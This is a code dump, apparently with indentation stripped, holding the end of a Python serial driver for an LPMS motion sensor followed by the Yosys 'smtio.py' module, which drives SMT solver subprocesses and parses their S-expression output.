self.serial_port = serial.Serial(self.port, self.baudrate, timeout=None,xonxoff=False, rtscts=False, dsrdtr=False)
self.quit = False
logd(self.TAG , "Sensor connected")
#thread.daemon = True # Daemonize thread
self.thread.start() # Start the execution
time.sleep(1)
self.set_command_mode() # Start the execution
time.sleep(.2)
self.__get_config_register() # Start the execution
time.sleep(.2)
self.set_streaming_mode()
return True
except serial.SerialException:
loge(self.TAG, "Could not open port " + self.port)
loge(self.TAG, "Please try again")
return False
def disconnect(self):
self.quit = True
if self.__thread_is_alive():
self.thread.join()
logd(self.TAG , "sensor disconnected")
return True
def is_connected(self):
return self.is_sensor_connected
# Configuration and Status
def get_config_register(self):
"""
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.__lpbus_set_none(LPMS_GET_CONFIG)
self.wait_for_data = True
self.__wait_for_response()
"""
return self.sensor_configuration
def get_status_register(self):
pass
# Mode switching
def set_command_mode(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return False
if self.verbose: logd(self.TAG, "Set command mode")
self.__lpbus_set_none(LPMS_GOTO_COMMAND_MODE)
self.wait_for_ack = True
self.__wait_for_response()
self.is_command_mode = True
def set_streaming_mode(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return False
self.set_command_mode()
if self.verbose: logd(self.TAG, "Set streaming mode")
self.__lpbus_set_none(LPMS_GOTO_STREAM_MODE)
self.wait_for_ack = True
self.__wait_for_response()
self.is_command_mode = False
# Data transmision
def get_sensor_data(self):
"""
get sensor data during command Mode
"""
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return False
if self.verbose: logd(self.TAG, "Get sensor data")
self.__lpbus_set_none(LPMS_GET_SENSOR_DATA)
self.wait_for_data = True
self.__wait_for_response()
return self.get_stream_data()
def get_stream_data(self):
"""
get sensor data during stream Mode
"""
data = []
data.append(self.imu_id)
data.append(self.timestamp)
data.append(self.frame_counter)
data.append(self.temperature)
data.append([self.acc_x, self.acc_y, self.acc_z])
data.append([self.gyr_x, self.gyr_y, self.gyr_z])
data.append([self.mag_x, self.mag_y, self.mag_z])
data.append([self.quat_w, self.quat_x, self.quat_y, self.quat_z])
data.append([self.euler_x, self.euler_y, self.euler_z])
data.append([self.linacc_x, self.linacc_y, self.linacc_z])
return data
def set_transmit_data(self):
pass
def set_baudrate(self, baud):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.set_command_mode()
if self.verbose: logd(self.TAG, "Set baudrate: "+str(baud)+"bps")
self.__lpbus_set_int32(LPMS_SET_UART_BAUDRATE ,baud)
self.wait_for_ack = True
self.__wait_for_response()
self.__get_config_register()
self.set_streaming_mode()
def set_stream_frequency(self, freq):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.set_command_mode()
if self.verbose: logd(self.TAG, "Set stream freq: "+str(freq)+"Hz")
self.__lpbus_set_int32(LPMS_SET_STREAM_FREQ , freq)
self.wait_for_ack = True
self.__wait_for_response()
self.__get_config_register()
self.set_streaming_mode()
def set_stream_frequency_5Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_5HZ)
def set_stream_frequency_10Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_10HZ)
def set_stream_frequency_25Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_25HZ)
def set_stream_frequency_50Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_50HZ)
def set_stream_frequency_100Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_100HZ)
def set_stream_frequency_200Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_200HZ)
def set_stream_frequency_400Hz(self):
self.set_stream_frequency(LPMS_STREAM_FREQ_400HZ)
def set_16bit_mode(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.set_command_mode()
if self.verbose: logd(self.TAG, "Set 16 bit data")
self.__lpbus_set_int32(LPMS_SET_LPBUS_DATA_MODE, LPMS_LPBUS_DATA_MODE_16)
self.wait_for_ack = True
self.__wait_for_response()
self.__get_config_register()
self.set_streaming_mode()
def set_32bit_mode(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.set_command_mode()
if self.verbose: logd(self.TAG, "Set 32 bit data")
self.__lpbus_set_int32(LPMS_SET_LPBUS_DATA_MODE, LPMS_LPBUS_DATA_MODE_32)
self.wait_for_ack = True
self.__wait_for_response()
self.__get_config_register()
self.set_streaming_mode()
# Register value save and reset
def save_parameters(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.set_command_mode()
if self.verbose: logd(self.TAG, "Save parameters to sensor")
self.__lpbus_set_none(LPMS_WRITE_REGISTERS)
self.wait_for_ack = True
self.__wait_for_response()
self.set_streaming_mode()
def reset_factory(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
self.set_command_mode()
if self.verbose: logd(self.TAG, "Reset factory settings")
self.__lpbus_set_none(LPMS_RESET_FACTORY_VALUE)
self.wait_for_ack = True
self.__wait_for_response()
self.__get_config_register()
self.set_streaming_mode()
# Reference setting and offset reset
def reset_reference(self):
pass
def start_mag_calibration(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return False
self.set_command_mode()
if self.verbose: logd(self.TAG, "Start mag calibration")
self.__lpbus_set_none(LPMS_START_MAG_CALIBRATION)
self.wait_for_ack = True
self.__wait_for_response()
self.set_streaming_mode()
|
smtio.py
|
#
# yosys -- Yosys Open SYnthesis Suite
#
# Copyright (C) 2012 Clifford Wolf <clifford@clifford.at>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
import sys, re, os, signal
import subprocess
if os.name == "posix":
import resource
from copy import deepcopy
from select import select
from time import time
from queue import Queue, Empty
from threading import Thread
# This is needed so that the recursive SMT2 S-expression parser
# does not run out of stack frames when parsing large expressions
if os.name == "posix":
smtio_reclimit = 64 * 1024
if sys.getrecursionlimit() < smtio_reclimit:
sys.setrecursionlimit(smtio_reclimit)
current_rlimit_stack = resource.getrlimit(resource.RLIMIT_STACK)
if current_rlimit_stack[0] != resource.RLIM_INFINITY:
smtio_stacksize = 128 * 1024 * 1024
if os.uname().sysname == "Darwin":
# MacOS has rather conservative stack limits
smtio_stacksize = 16 * 1024 * 1024
if current_rlimit_stack[1] != resource.RLIM_INFINITY:
smtio_stacksize = min(smtio_stacksize, current_rlimit_stack[1])
if current_rlimit_stack[0] < smtio_stacksize:
resource.setrlimit(resource.RLIMIT_STACK, (smtio_stacksize, current_rlimit_stack[1]))
# currently running solvers (so we can kill them)
running_solvers = dict()
forced_shutdown = False
solvers_index = 0
def force_shutdown(signum, frame):
global forced_shutdown
if not forced_shutdown:
forced_shutdown = True
if signum is not None:
print("<%s>" % signal.Signals(signum).name)
for p in running_solvers.values():
# os.killpg(os.getpgid(p.pid), signal.SIGTERM)
os.kill(p.pid, signal.SIGTERM)
sys.exit(1)
if os.name == "posix":
signal.signal(signal.SIGHUP, force_shutdown)
signal.signal(signal.SIGINT, force_shutdown)
signal.signal(signal.SIGTERM, force_shutdown)
def except_hook(exctype, value, traceback):
if not forced_shutdown:
sys.__excepthook__(exctype, value, traceback)
force_shutdown(None, None)
sys.excepthook = except_hook
hex_dict = {
"0": "0000", "1": "0001", "2": "0010", "3": "0011",
"4": "0100", "5": "0101", "6": "0110", "7": "0111",
"8": "1000", "9": "1001", "A": "1010", "B": "1011",
"C": "1100", "D": "1101", "E": "1110", "F": "1111",
"a": "1010", "b": "1011", "c": "1100", "d": "1101",
"e": "1110", "f": "1111"
}
class SmtModInfo:
def __init__(self):
self.inputs = set()
self.outputs = set()
self.registers = set()
self.memories = dict()
self.wires = set()
self.wsize = dict()
self.clocks = dict()
self.cells = dict()
self.asserts = dict()
self.covers = dict()
self.anyconsts = dict()
self.anyseqs = dict()
self.allconsts = dict()
self.allseqs = dict()
self.asize = dict()
class SmtIo:
def __init__(self, opts=None):
global solvers_index
self.logic = None
self.logic_qf = True
self.logic_ax = True
self.logic_uf = True
self.logic_bv = True
self.logic_dt = False
self.forall = False
self.produce_models = True
self.smt2cache = [list()]
self.p = None
self.p_index = solvers_index
solvers_index += 1
if opts is not None:
self.logic = opts.logic
self.solver = opts.solver
self.solver_opts = opts.solver_opts
self.debug_print = opts.debug_print
self.debug_file = opts.debug_file
self.dummy_file = opts.dummy_file
self.timeinfo = opts.timeinfo
self.unroll = opts.unroll
self.noincr = opts.noincr
self.info_stmts = opts.info_stmts
self.nocomments = opts.nocomments
else:
self.solver = "yices"
self.solver_opts = list()
self.debug_print = False
self.debug_file = None
self.dummy_file = None
self.timeinfo = os.name != "nt"
self.unroll = False
self.noincr = False
self.info_stmts = list()
self.nocomments = False
self.start_time = time()
self.modinfo = dict()
self.curmod = None
self.topmod = None
self.setup_done = False
def __del__(self):
if self.p is not None and not forced_shutdown:
os.killpg(os.getpgid(self.p.pid), signal.SIGTERM)
if running_solvers is not None:
del running_solvers[self.p_index]
def setup(self):
assert not self.setup_done
if self.forall:
self.unroll = False
if self.solver == "yices":
if self.noincr:
self.popen_vargs = ['yices-smt2'] + self.solver_opts
else:
self.popen_vargs = ['yices-smt2', '--incremental'] + self.solver_opts
if self.solver == "z3":
self.popen_vargs = ['z3', '-smt2', '-in'] + self.solver_opts
if self.solver == "cvc4":
if self.noincr:
self.popen_vargs = ['cvc4', '--lang', 'smt2.6' if self.logic_dt else 'smt2'] + self.solver_opts
else:
self.popen_vargs = ['cvc4', '--incremental', '--lang', 'smt2.6' if self.logic_dt else 'smt2'] + self.solver_opts
if self.solver == "mathsat":
self.popen_vargs = ['mathsat'] + self.solver_opts
if self.solver == "boolector":
if self.noincr:
self.popen_vargs = ['boolector', '--smt2'] + self.solver_opts
else:
self.popen_vargs = ['boolector', '--smt2', '-i'] + self.solver_opts
self.unroll = True
if self.solver == "abc":
if len(self.solver_opts) > 0:
self.popen_vargs = ['yosys-abc', '-S', '; '.join(self.solver_opts)]
else:
self.popen_vargs = ['yosys-abc', '-S', '%blast; &sweep -C 5000; &syn4; &cec -s -m -C 2000']
self.logic_ax = False
self.unroll = True
self.noincr = True
if self.solver == "dummy":
assert self.dummy_file is not None
self.dummy_fd = open(self.dummy_file, "r")
else:
if self.dummy_file is not None:
self.dummy_fd = open(self.dummy_file, "w")
if not self.noincr:
self.p_open()
if self.unroll:
assert not self.forall
self.logic_uf = False
self.unroll_idcnt = 0
self.unroll_buffer = ""
self.unroll_sorts = set()
self.unroll_objs = set()
self.unroll_decls = dict()
self.unroll_cache = dict()
self.unroll_stack = list()
if self.logic is None:
self.logic = ""
if self.logic_qf: self.logic += "QF_"
if self.logic_ax: self.logic += "A"
if self.logic_uf: self.logic += "UF"
if self.logic_bv: self.logic += "BV"
if self.logic_dt: self.logic = "ALL"
self.setup_done = True
for stmt in self.info_stmts:
self.write(stmt)
if self.produce_models:
self.write("(set-option :produce-models true)")
self.write("(set-logic %s)" % self.logic)
def timestamp(self):
secs = int(time() - self.start_time)
return "## %3d:%02d:%02d " % (secs // (60*60), (secs // 60) % 60, secs % 60)
def replace_in_stmt(self, stmt, pat, repl):
if stmt == pat:
return repl
if isinstance(stmt, list):
return [self.replace_in_stmt(s, pat, repl) for s in stmt]
return stmt
def unroll_stmt(self, stmt):
if not isinstance(stmt, list):
return stmt
stmt = [self.unroll_stmt(s) for s in stmt]
if len(stmt) >= 2 and not isinstance(stmt[0], list) and stmt[0] in self.unroll_decls:
assert stmt[1] in self.unroll_objs
key = tuple(stmt)
if key not in self.unroll_cache:
decl = deepcopy(self.unroll_decls[key[0]])
self.unroll_cache[key] = "|UNROLL#%d|" % self.unroll_idcnt
decl[1] = self.unroll_cache[key]
self.unroll_idcnt += 1
if decl[0] == "declare-fun":
if isinstance(decl[3], list) or decl[3] not in self.unroll_sorts:
self.unroll_objs.add(decl[1])
decl[2] = list()
else:
self.unroll_objs.add(decl[1])
decl = list()
elif decl[0] == "define-fun":
arg_index = 1
for arg_name, arg_sort in decl[2]:
decl[4] = self.replace_in_stmt(decl[4], arg_name, key[arg_index])
arg_index += 1
decl[2] = list()
if len(decl) > 0:
decl = self.unroll_stmt(decl)
self.write(self.unparse(decl), unroll=False)
return self.unroll_cache[key]
return stmt
def p_thread_main(self):
while True:
data = self.p.stdout.readline().decode("ascii")
if data == "": break
self.p_queue.put(data)
self.p_queue.put("")
self.p_running = False
def p_open(self):
assert self.p is None
self.p = subprocess.Popen(self.popen_vargs, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
running_solvers[self.p_index] = self.p
self.p_running = True
self.p_next = None
self.p_queue = Queue()
self.p_thread = Thread(target=self.p_thread_main)
self.p_thread.start()
def p_write(self, data, flush):
assert self.p is not None
self.p.stdin.write(bytes(data, "ascii"))
if flush: self.p.stdin.flush()
def p_read(self):
assert self.p is not None
if self.p_next is not None:
data = self.p_next
self.p_next = None
return data
if not self.p_running:
return ""
return self.p_queue.get()
def p_poll(self, timeout=0.1):
assert self.p is not None
assert self.p_running
if self.p_next is not None:
return False
try:
self.p_next = self.p_queue.get(True, timeout)
return False
except Empty:
return True
def p_close(self):
assert self.p is not None
self.p.stdin.close()
self.p_thread.join()
assert not self.p_running
del running_solvers[self.p_index]
self.p = None
self.p_next = None
self.p_queue = None
self.p_thread = None
def write(self, stmt, unroll=True):
if stmt.startswith(";"):
self.info(stmt)
if not self.setup_done:
self.info_stmts.append(stmt)
return
elif not self.setup_done:
self.setup()
stmt = stmt.strip()
if self.nocomments or self.unroll:
stmt = re.sub(r" *;.*", "", stmt)
if stmt == "": return
if unroll and self.unroll:
stmt = self.unroll_buffer + stmt
self.unroll_buffer = ""
s = re.sub(r"\|[^|]*\|", "", stmt)
if s.count("(") != s.count(")"):
self.unroll_buffer = stmt + " "
return
s = self.parse(stmt)
if self.debug_print:
print("-> %s" % s)
if len(s) == 3 and s[0] == "declare-sort" and s[2] == "0":
self.unroll_sorts.add(s[1])
return
elif len(s) == 4 and s[0] == "declare-fun" and s[2] == [] and s[3] in self.unroll_sorts:
self.unroll_objs.add(s[1])
return
elif len(s) >= 4 and s[0] == "declare-fun":
for arg_sort in s[2]:
if arg_sort in self.unroll_sorts:
self.unroll_decls[s[1]] = s
return
elif len(s) >= 4 and s[0] == "define-fun":
for arg_name, arg_sort in s[2]:
if arg_sort in self.unroll_sorts:
self.unroll_decls[s[1]] = s
return
stmt = self.unparse(self.unroll_stmt(s))
if stmt == "(push 1)":
self.unroll_stack.append((
deepcopy(self.unroll_sorts),
deepcopy(self.unroll_objs),
deepcopy(self.unroll_decls),
deepcopy(self.unroll_cache),
))
if stmt == "(pop 1)":
self.unroll_sorts, self.unroll_objs, self.unroll_decls, self.unroll_cache = self.unroll_stack.pop()
if self.debug_print:
print("> %s" % stmt)
if self.debug_file:
print(stmt, file=self.debug_file)
self.debug_file.flush()
if self.solver != "dummy":
if self.noincr:
if self.p is not None and not stmt.startswith("(get-"):
self.p_close()
if stmt == "(push 1)":
self.smt2cache.append(list())
elif stmt == "(pop 1)":
self.smt2cache.pop()
else:
if self.p is not None:
self.p_write(stmt + "\n", True)
self.smt2cache[-1].append(stmt)
else:
self.p_write(stmt + "\n", True)
def info(self, stmt):
if not stmt.startswith("; yosys-smt2-"):
return
fields = stmt.split()
if fields[1] == "yosys-smt2-nomem":
if self.logic is None:
self.logic_ax = False
if fields[1] == "yosys-smt2-nobv":
if self.logic is None:
self.logic_bv = False
if fields[1] == "yosys-smt2-stdt":
if self.logic is None:
self.logic_dt = True
if fields[1] == "yosys-smt2-forall":
if self.logic is None:
self.logic_qf = False
self.forall = True
if fields[1] == "yosys-smt2-module":
self.curmod = fields[2]
self.modinfo[self.curmod] = SmtModInfo()
if fields[1] == "yosys-smt2-cell":
self.modinfo[self.curmod].cells[fields[3]] = fields[2]
if fields[1] == "yosys-smt2-topmod":
self.topmod = fields[2]
if fields[1] == "yosys-smt2-input":
self.modinfo[self.curmod].inputs.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-output":
self.modinfo[self.curmod].outputs.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-register":
self.modinfo[self.curmod].registers.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-memory":
self.modinfo[self.curmod].memories[fields[2]] = (int(fields[3]), int(fields[4]), int(fields[5]), int(fields[6]), fields[7] == "async")
if fields[1] == "yosys-smt2-wire":
self.modinfo[self.curmod].wires.add(fields[2])
self.modinfo[self.curmod].wsize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-clock":
for edge in fields[3:]:
if fields[2] not in self.modinfo[self.curmod].clocks:
self.modinfo[self.curmod].clocks[fields[2]] = edge
elif self.modinfo[self.curmod].clocks[fields[2]] != edge:
self.modinfo[self.curmod].clocks[fields[2]] = "event"
if fields[1] == "yosys-smt2-assert":
self.modinfo[self.curmod].asserts["%s_a %s" % (self.curmod, fields[2])] = fields[3]
if fields[1] == "yosys-smt2-cover":
self.modinfo[self.curmod].covers["%s_c %s" % (self.curmod, fields[2])] = fields[3]
if fields[1] == "yosys-smt2-anyconst":
self.modinfo[self.curmod].anyconsts[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-anyseq":
self.modinfo[self.curmod].anyseqs[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-allconst":
self.modinfo[self.curmod].allconsts[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
if fields[1] == "yosys-smt2-allseq":
self.modinfo[self.curmod].allseqs[fields[2]] = (fields[4], None if len(fields) <= 5 else fields[5])
self.modinfo[self.curmod].asize[fields[2]] = int(fields[3])
def hiernets(self, top, regs_only=False):
def hiernets_worker(nets, mod, cursor):
for netname in sorted(self.modinfo[mod].wsize.keys()):
if not regs_only or netname in self.modinfo[mod].registers:
nets.append(cursor + [netname])
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
hiernets_worker(nets, celltype, cursor + [cellname])
nets = list()
hiernets_worker(nets, top, [])
return nets
def hieranyconsts(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].anyconsts.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hieranyseqs(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].anyseqs.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hierallconsts(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].allconsts.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hierallseqs(self, top):
def worker(results, mod, cursor):
for name, value in sorted(self.modinfo[mod].allseqs.items()):
width = self.modinfo[mod].asize[name]
results.append((cursor, name, value[0], value[1], width))
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
worker(results, celltype, cursor + [cellname])
results = list()
worker(results, top, [])
return results
def hiermems(self, top):
def hiermems_worker(mems, mod, cursor):
for memname in sorted(self.modinfo[mod].memories.keys()):
mems.append(cursor + [memname])
for cellname, celltype in sorted(self.modinfo[mod].cells.items()):
hiermems_worker(mems, celltype, cursor + [cellname])
mems = list()
hiermems_worker(mems, top, [])
return mems
def read(self):
stmt = []
count_brackets = 0
while True:
if self.solver == "dummy":
line = self.dummy_fd.readline().strip()
else:
line = self.p_read().strip()
if self.dummy_file is not None:
self.dummy_fd.write(line + "\n")
count_brackets += line.count("(")
count_brackets -= line.count(")")
stmt.append(line)
if self.debug_print:
print("< %s" % line)
if count_brackets == 0:
break
if self.solver != "dummy" and self.p.poll():
print("%s Solver terminated unexpectedly: %s" % (self.timestamp(), "".join(stmt)), flush=True)
sys.exit(1)
stmt = "".join(stmt)
if stmt.startswith("(error"):
print("%s Solver Error: %s" % (self.timestamp(), stmt), flush=True)
if self.solver != "dummy":
self.p_close()
sys.exit(1)
return stmt
def check_sat(self):
if self.debug_print:
print("> (check-sat)")
if self.debug_file and not self.nocomments:
print("; running check-sat..", file=self.debug_file)
self.debug_file.flush()
if self.solver != "dummy":
if self.noincr:
if self.p is not None:
self.p_close()
self.p_open()
for cache_ctx in self.smt2cache:
for cache_stmt in cache_ctx:
self.p_write(cache_stmt + "\n", False)
self.p_write("(check-sat)\n", True)
if self.timeinfo:
i = 0
s = "/-\|"
count = 0
num_bs = 0
while self.p_poll():
count += 1
if count < 25:
continue
if count % 10 == 0 or count == 25:
secs = count // 10
if secs < 60:
m = "(%d seconds)" % secs
elif secs < 60*60:
m = "(%d seconds -- %d:%02d)" % (secs, secs // 60, secs % 60)
else:
m = "(%d seconds -- %d:%02d:%02d)" % (secs, secs // (60*60), (secs // 60) % 60, secs % 60)
print("%s %s %c" % ("\b \b" * num_bs, m, s[i]), end="", file=sys.stderr)
num_bs = len(m) + 3
else:
print("\b" + s[i], end="", file=sys.stderr)
sys.stderr.flush()
i = (i + 1) % len(s)
if num_bs != 0:
print("\b \b" * num_bs, end="", file=sys.stderr)
sys.stderr.flush()
else:
count = 0
while self.p_poll(60):
count += 1
msg = None
if count == 1:
msg = "1 minute"
elif count in [5, 10, 15, 30]:
msg = "%d minutes" % count
elif count == 60:
msg = "1 hour"
elif count % 60 == 0:
msg = "%d hours" % (count // 60)
if msg is not None:
print("%s waiting for solver (%s)" % (self.timestamp(), msg), flush=True)
result = self.read()
if self.debug_file:
print("(set-info :status %s)" % result, file=self.debug_file)
print("(check-sat)", file=self.debug_file)
self.debug_file.flush()
if result not in ["sat", "unsat"]:
if result == "":
print("%s Unexpected EOF response from solver." % (self.timestamp()), flush=True)
else:
print("%s Unexpected response from solver: %s" % (self.timestamp(), result), flush=True)
if self.solver != "dummy":
self.p_close()
sys.exit(1)
return result
def parse(self, stmt):
def worker(stmt):
if stmt[0] == '(':
expr = []
cursor = 1
while stmt[cursor] != ')':
el, le = worker(stmt[cursor:])
expr.append(el)
cursor += le
return expr, cursor+1
if stmt[0] == '|':
expr = "|"
cursor = 1
while stmt[cursor] != '|':
expr += stmt[cursor]
cursor += 1
expr += "|"
return expr, cursor+1
if stmt[0] in [" ", "\t", "\r", "\n"]:
el, le = worker(stmt[1:])
return el, le+1
expr = ""
cursor = 0
while stmt[cursor] not in ["(", ")", "|", " ", "\t", "\r", "\n"]:
expr += stmt[cursor]
cursor += 1
return expr, cursor
return worker(stmt)[0]
def unparse(self, stmt):
if isinstance(stmt, list):
return "(" + " ".join([self.unparse(s) for s in stmt]) + ")"
return stmt
def bv2hex(self, v):
h = ""
v = self.bv2bin(v)
while len(v) > 0:
d = 0
if len(v) > 0 and v[-1] == "1": d += 1
if len(v) > 1 and v[-2] == "1": d += 2
if len(v) > 2 and v[-3] == "1": d += 4
if len(v) > 3 and v[-4] == "1": d += 8
h = hex(d)[2:] + h
if len(v) < 4: break
v = v[:-4]
return h
def bv2bin(self, v):
if type(v) is list and len(v) == 3 and v[0] == "_" and v[1].startswith("bv"):
x, n = int(v[1][2:]), int(v[2])
return "".join("1" if (x & (1 << i)) else "0" for i in range(n-1, -1, -1))
if v == "true": return "1"
if v == "false": return "0"
if v.startswith("#b"):
return v[2:]
if v.startswith("#x"):
return "".join(hex_dict.get(x) for x in v[2:])
assert False
def bv2int(self, v):
return int(self.bv2bin(v), 2)
def get(self, expr):
self.write("(get-value (%s))" % (expr))
return self.parse(self.read())[0][1]
def get_list(self, expr_list):
if len(expr_list) == 0:
return []
self.write("(get-value (%s))" % " ".join(expr_list))
return [n[1] for n in self.parse(self.read())]
def get_path(self, mod, path):
assert mod in self.modinfo
path = path.split(".")
for i in range(len(path)-1):
first = ".".join(path[0:i+1])
second = ".".join(path[i+1:])
if first in self.modinfo[mod].cells:
nextmod = self.modinfo[mod].cells[first]
return [first] + self.get_path(nextmod, second)
return [".".join(path)]
def net_expr(self, mod, base, path):
if len(path) == 0:
return base
if len(path) == 1:
assert mod in self.modinfo
if path[0] == "":
return base
if path[0] in self.modinfo[mod].cells:
return "(|%s_h %s| %s)" % (mod, path[0], base)
if path[0] in self.modinfo[mod].wsize:
return "(|%s_n %s| %s)" % (mod, path[0], base)
if path[0] in self.modinfo[mod].memories:
return "(|%s_m %s| %s)" % (mod, path[0], base)
assert 0
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].cells
nextmod = self.modinfo[mod].cells[path[0]]
nextbase = "(|%s_h %s| %s)" % (mod, path[0], base)
return self.net_expr(nextmod, nextbase, path[1:])
def net_width(self, mod, net_path):
for i in range(len(net_path)-1):
assert mod in self.modinfo
assert net_path[i] in self.modinfo[mod].cells
mod = self.modinfo[mod].cells[net_path[i]]
assert mod in self.modinfo
assert net_path[-1] in self.modinfo[mod].wsize
return self.modinfo[mod].wsize[net_path[-1]]
def net_clock(self, mod, net_path):
for i in range(len(net_path)-1):
assert mod in self.modinfo
assert net_path[i] in self.modinfo[mod].cells
mod = self.modinfo[mod].cells[net_path[i]]
assert mod in self.modinfo
if net_path[-1] not in self.modinfo[mod].clocks:
return None
return self.modinfo[mod].clocks[net_path[-1]]
def net_exists(self, mod, net_path):
for i in range(len(net_path)-1):
if mod not in self.modinfo: return False
if net_path[i] not in self.modinfo[mod].cells: return False
mod = self.modinfo[mod].cells[net_path[i]]
if mod not in self.modinfo: return False
if net_path[-1] not in self.modinfo[mod].wsize: return False
return True
def mem_exists(self, mod, mem_path):
for i in range(len(mem_path)-1):
if mod not in self.modinfo: return False
if mem_path[i] not in self.modinfo[mod].cells: return False
mod = self.modinfo[mod].cells[mem_path[i]]
if mod not in self.modinfo: return False
if mem_path[-1] not in self.modinfo[mod].memories: return False
return True
def mem_expr(self, mod, base, path, port=None, infomode=False):
if len(path) == 1:
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].memories
if infomode:
return self.modinfo[mod].memories[path[0]]
return "(|%s_m%s %s| %s)" % (mod, "" if port is None else ":%s" % port, path[0], base)
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].cells
nextmod = self.modinfo[mod].cells[path[0]]
nextbase = "(|%s_h %s| %s)" % (mod, path[0], base)
return self.mem_expr(nextmod, nextbase, path[1:], port=port, infomode=infomode)
def mem_info(self, mod, path):
return self.mem_expr(mod, "", path, infomode=True)
def get_net(self, mod_name, net_path, state_name):
return self.get(self.net_expr(mod_name, state_name, net_path))
def get_net_list(self, mod_name, net_path_list, state_name):
return self.get_list([self.net_expr(mod_name, state_name, n) for n in net_path_list])
def get_net_hex(self, mod_name, net_path, state_name):
return self.bv2hex(self.get_net(mod_name, net_path, state_name))
def get_net_hex_list(self, mod_name, net_path_list, state_name):
return [self.bv2hex(v) for v in self.get_net_list(mod_name, net_path_list, state_name)]
def get_net_bin(self, mod_name, net_path, state_name):
return self.bv2bin(self.get_net(mod_name, net_path, state_name))
def get_net_bin_list(self, mod_name, net_path_list, state_name):
return [self.bv2bin(v) for v in self.get_net_list(mod_name, net_path_list, state_name)]
def wait(self):
if self.p is not None:
self.p.wait()
self.p_close()
class SmtOpts:
def __init__(self):
self.shortopts = "s:S:v"
self.longopts = ["unroll", "noincr", "noprogress", "dump-smt2=", "logic=", "dummy=", "info=", "nocomments"]
self.solver = "yices"
self.solver_opts = list()
self.debug_print = False
self.debug_file = None
self.dummy_file = None
self.unroll = False
self.noincr = False
self.timeinfo = os.name != "nt"
self.logic = None
self.info_stmts = list()
self.nocomments = False
def handle(self, o, a):
if o == "-s":
self.solver = a
elif o == "-S":
self.solver_opts.append(a)
elif o == "-v":
self.debug_print = True
elif o == "--unroll":
self.unroll = True
elif o == "--noincr":
self.noincr = True
elif o == "--noprogress":
self.timeinfo = False
elif o == "--dump-smt2":
self.debug_file = open(a, "w")
elif o == "--logic":
self.logic = a
elif o == "--dummy":
self.dummy_file = a
elif o == "--info":
self.info_stmts.append(a)
elif o == "--nocomments":
self.nocomments = True
else:
return False
return True
def helpmsg(self):
return """
-s <solver>
set SMT solver: z3, yices, boolector, cvc4, mathsat, dummy
default: yices
-S <opt>
pass <opt> as command line argument to the solver
--logic <smt2_logic>
use the specified SMT2 logic (e.g. QF_AUFBV)
--dummy <filename>
if solver is "dummy", read solver output from that file
otherwise: write solver output to that file
-v
enable debug output
--unroll
unroll uninterpreted functions
--noincr
don't use incremental solving, instead restart solver for
each (check-sat). This also avoids (push) and (pop).
--noprogress
disable timer display during solving
(this option is set implicitly on Windows)
